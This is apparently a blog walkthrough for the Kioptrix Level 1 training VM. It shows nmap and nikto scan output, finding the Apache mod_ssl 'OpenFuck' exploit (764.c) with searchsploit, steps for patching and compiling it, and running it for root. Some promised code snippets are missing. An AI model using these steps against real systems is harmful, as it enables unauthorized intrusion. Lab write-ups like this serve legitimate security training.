This is a walkthrough for Kioptrix Level 1. Although getting root on this box is pretty straightforward it’s a great place for those looking to get their feet wet when it comes to boot2root VM’s. I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with it’s list of vulnerabilities.The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/
After loading up the VM I used
netdiscover -r to find it’s IP address which was 192.168.2.90
Now it’s time to use Nmap to grab info about what ports and services are available.
root@moriarty:~# nmap -sV -P0 -A 192.168.2.90
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT Nmap scan report for 192.168.2.90 Host is up (0.00069s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-title: Test Page for the Apache Web Server on Red Hat Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 32768/tcp status |_ 100024 1 32768/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) | http-methods: Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-title: Test Page for the Apache Web Server on Red Hat Linux | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-09-26T08:32:06+00:00 |_Not valid after: 2010-09-26T08:32:06+00:00 |_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 |_ SSL2_RC4_128_EXPORT40_WITH_MD5 32768/tcp open status 1 (RPC #100024) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 32768/tcp status |_ 100024 1 32768/udp status MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop Host script results: |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown) TRACEROUTE HOP RTT ADDRESS 1 0.69 ms 192.168.2.90 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds
The first thing I noticed is that most of these services are pretty out dated which is good news. The second thing that grabs my attention is the version of Apache that is being run. There are clearly several different services running that may provide a foothold into the box but I decided to stick with Apache since it caught my eye. I fire up Iceweasel and find a default looking Apache page running on the webserver. Now to run Nikto to see what kind of information it can gather about the webserver.
root@moriarty:~# nikto -h 192.168.2.90- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.2.90 + Target Hostname: 192.168.2.90 + Target Port: 80 + Start Time: 2014-08-13 11:44:28 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b + Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001 + The anti-clickjacking X-Frame-Options header is not present. + Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current. + mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version) + OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current. + OSVDB-27487: Apache is vulnerable to XSS via the Expect header + OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users). + Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392. + OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839. + OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542. + mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756. + ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL. + OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-3268: /manual/: Directory indexing found. + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-3092: /test.php: This might be interesting... + 7355 requests: 0 error(s) and 20 item(s) reported on remote host + End Time: 2014-08-13 11:44:53 (GMT-4) (25 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Ok so the first thing that Nikto returns is
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
I do a simple Google search to see if there are any obvious exploits that fit my needs.
Well the first result seems to fit the bill quite well. Now I’m going to use searchsploit to see if I’ve already got this exploit.
root@moriarty:~# searchsploit apache openssl
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c
Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.
Ok so the very first section gives us what we need.
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
If you try to compile this without changing the code you'll end up with a bunch of errors and issues.
Luckily the paulsec write up is very straight forward. So here are the changes I made.
Here are the steps I used to get this to compile in VI.
1) Add these two headers:
2) Update the URL of the C file:
Search for packetstorm and replace the URL with the following
3) Install the libssl-dev library if you don't have it already:
apt-get install libssl-dev
4) Update the declaration of variables:
unsigned char *p
and change it to
const unsigned char *p, *end;
5) Compile the code and Bob's your uncle:
gcc -o exploit 764.c -lcrypto
So the exploit compiled without any issues this time. Now it’s time to move in for the kill.
root@moriarty:/tmp/exploit# ./exploit | grep -i redhat | grep “1.3.20”
This shows me that I’ve got two options for this exploit so I first try the 0x6a but it doesn’t quite work out.
So I try the 2nd which is 0x6b and decide to add a range of 40 connections for a better shot at getting this to work.
And there it is. Root access on Kioptrix Level 1. Feel free to leave feedback and questions in the comments.